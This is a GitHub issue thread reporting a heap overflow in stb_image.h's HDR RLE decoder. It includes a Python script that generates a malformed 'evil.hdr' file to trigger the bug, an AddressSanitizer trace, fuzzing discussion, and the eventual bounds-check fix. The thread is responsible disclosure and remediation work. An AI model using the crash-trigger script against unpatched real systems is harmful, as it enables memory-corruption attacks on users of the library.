Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

stb_image.h: stbi__hdr_load heap overflow #317

Closed
cryptoad opened this issue May 25, 2016 · 6 comments
Closed

stb_image.h: stbi__hdr_load heap overflow #317

cryptoad opened this issue May 25, 2016 · 6 comments
Labels
1 stb_image 2 bug

Comments

@cryptoad
Copy link

There is a heap overflow condition in the HDR parsing due to the RLE decoding loop not checking that there is enough space in the allocated buffer.

An HDR triggering the vulnerability can be generated with the following Python script:

import struct

def main():
  h=b'#?RADIANCE\n'
  h+=b'FORMAT=32-bit_rle_rgbe\n'
  h+=b'\n'
  height=1
  width=0x3a
  h+=b'-Y %d +X %d\n'%(height,width)
  h+=struct.pack('>BBH',2,2,width)
  q=0x4343434343434343
  for i in range(4):
    h+=struct.pack('>B',128+(width-1))+b'B'
    h+=struct.pack('>B',3)+b'B'+struct.pack('>BB',(q>>(i<<3))&0xff,
                                                  (q>>(32+(i<<3)))&0xff)

  f=open('evil.hdr','wb')
  f.write(h)
  f.close()

if __name__=='__main__':
  main()

And here is the ASan report:

==8373==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ea8 at pc 0x7f26b4438221 bp 0x7ffcb3d619f0 sp 0x7ffcb3d619e8
WRITE of size 1 at 0x611000009ea8 thread T0
    #0 0x7f26b4438220 in stbi__hdr_load third_party/stblib/stb_image.h:6237:44
    #1 0x7f26b4431d65 in stbi__load_main third_party/stblib/stb_image.h:964:20
    #2 0x7f26b4430a77 in stbi__load_flip third_party/stblib/stb_image.h:980:28
    #3 0x7f26b4430fbf in stbi_load_from_memory third_party/stblib/stb_image.h:1069:11
    #4 0x7f26b4430266 in main experimental/users/kostyak/ionfuzz/stb.cc:21:8
    #5 0x7f26b33c1ce7 in __libc_start_main (/usr/grte/v4/lib64/libc.so.6+0x38ce7)
    #6 0x7f26b4371f08 in _start /usr/grte/v4/debug-src/glibc-2.19/csu/../sysdeps/x86_64/start.S:108

0x611000009ea8 is located 0 bytes to the right of 232-byte region [0x611000009dc0,0x611000009ea8)
allocated by thread T0 here:
    #0 0x7f26b441aa3b in __interceptor_malloc third_party/llvm/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7f26b4431234 in stbi__malloc third_party/stblib/stb_image.h:900:12
    #2 0x7f26b443805e in stbi__hdr_load third_party/stblib/stb_image.h:6222:55
    #3 0x7f26b4431d65 in stbi__load_main third_party/stblib/stb_image.h:964:20
    #4 0x7f26b4430a77 in stbi__load_flip third_party/stblib/stb_image.h:980:28
    #5 0x7f26b4430fbf in stbi_load_from_memory third_party/stblib/stb_image.h:1069:11
    #6 0x7f26b4430266 in main experimental/users/kostyak/ionfuzz/stb.cc:21:8
    #7 0x7f26b33c1ce7 in __libc_start_main (/usr/grte/v4/lib64/libc.so.6+0x38ce7)
    #8 0x7f26b4371f08 in _start /usr/grte/v4/debug-src/glibc-2.19/csu/../sysdeps/x86_64/start.S:108
@nothings
Copy link
Owner

Is there a reason you're posting a script that generates the file rather than attaching the file?

@cryptoad
Copy link
Author

Well the file itself would be a single instance of things gone wrong, while the script can be used to generate other edge cases and test a potential fix more thoroughly.

@nothings
Copy link
Owner

nothings commented May 26, 2016
edited

Only if I have whatever fuzzing tool you're using? I don't even have python installed, so it's not particularly useful to me either way.

@cryptoad
Copy link
Author

cryptoad commented May 27, 2016
edited

Well this one just generates an evil.hdr file that triggers the issue. There is no additional dependency on anything, just need Python. If you don't want to install Python you might be able to use an online compiler maybe, haven't tried any though.

@andrewla
Copy link

andrewla commented Jun 6, 2016

I've actually been doing a fuzz of the stb_image.h file and have independently identified most of the issues that @cryptoad has found here. I've been using AFL -- http://lcamtuf.coredump.cx/afl/ -- which is very easy to set up and get running.

For reference, here is a zip of the file produced by the above script, and I've reproed that it does seg fault.
evil.hdr.zip

@cryptoad
Copy link
Author

cryptoad commented Jun 9, 2016

Attached is a diff that seems to fix the issues reported (and a couple more).
Do not take it as is though, you might want to double check it and do some regression testing to make sure nothing broke.

stblib-diff.txt

rygorous added a commit to rygorous/stb that referenced this issue Aug 13, 2016
@rygorous
stb_image: Fix HDR/PSD RLE decoders.
273733a 
Runs need to be bounds checked.

Fixes issues nothings#315, nothings#317.
@rygorous rygorous mentioned this issue Aug 13, 2016
Merged
rygorous added a commit to rygorous/stb that referenced this issue Oct 22, 2016
@rygorous
stb_image: Fix HDR/PSD RLE decoders.
62f3727 
Runs need to be bounds checked.

Fixes issues nothings#315, nothings#317.
@rygorous rygorous closed this as completed Dec 4, 2016
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
1 stb_image 2 bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@andrewla @rygorous @cryptoad @nothings